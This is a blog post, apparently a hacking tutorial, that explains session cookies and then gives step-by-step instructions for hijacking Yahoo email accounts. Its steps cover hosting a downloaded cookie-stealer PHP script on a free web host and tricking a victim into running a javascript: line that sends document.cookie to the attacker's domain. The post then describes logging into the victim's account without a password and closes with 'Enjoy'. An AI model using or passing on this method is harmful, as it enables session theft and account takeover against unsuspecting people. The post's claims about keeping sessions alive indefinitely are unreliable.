What are Session ID's or Session Cookies??
A session ID is a unique piece of string that is generated when a user signs into any account. One copy is stored on the server and the other copy is saved onto the user's browser as a cookie. Both copies are matched everytime a user does anything to his or her account. This session ID's are destroyed immidiately when the user clicks on the ''sign out'' button.
To view your session cookies, Just login to yahoo.com. Type in browser;
javascript:alert(document.cookie);
These are the same piece of strings that an attacker (Hacker) can attempt to steal by tricking his victim into running a piece of code on his browser (Victim's browser). Once an attacker gains access to the victim's cookies, he will be able to automatically login to the victim's account without the need to provide a username and password, hence a hacked session.. :P:P:P
This is a very rare type of a cyber attack because when the victim clicks on the ''sign out'' button, the cookie gets destroyed and hence the attacker gets signed out.
In the case of yahoo, the hacker doesnt get signed out even when the user clicks the ''sign out'' button. Instead yahoo destoys the sesseion automatically after atleast 24hours. But when the user refreshes the windows in yahoo account, he gets sessions for the next 24 hours. This means that an attacker can do the same by refreshing the window in every 24 hours, thereby getting access the victim's account for a lifetime :D
HOW TO STEAL SESSION ID's
1. Download the cookie stealer here
2. Sign up for a free account at any php enabled webhosting site. I advise you to choose www.my3gb.com
3. Login to your my3gb file manager and upload the four files that you have just downloaded. Then Create an empty directory and rename it as ''cookies'' as shown in the image below;
- Yahoo.php is basically cookie stealing script, hacked.php executes the stolen cookies in browser. and the Stolen cookies get stored in directory ''cookies''
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
Trick your victim into entering and running the above code into his browser. How you will trick your victim will totally depend on your creativity.
5. After you are sure that your victim has run the code in his browser, go to your my3gb file manager and open ''hacked.php''. The password is explore
6. Enter the password explore and click ''login'', then you will find the Username to the yahoo account of the hacked session... as shown below;
7. Click on the Username and its game Over!!!,.. it will take you straight into the victim's email account without asking for the password. :D:D:D
- It doesn't matter if victim signs out from his account, you would remain logged into it.
Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session. Also note that the script will not work in latest versions of google chrome.
Enjoy.:D
0 comments:
Post a Comment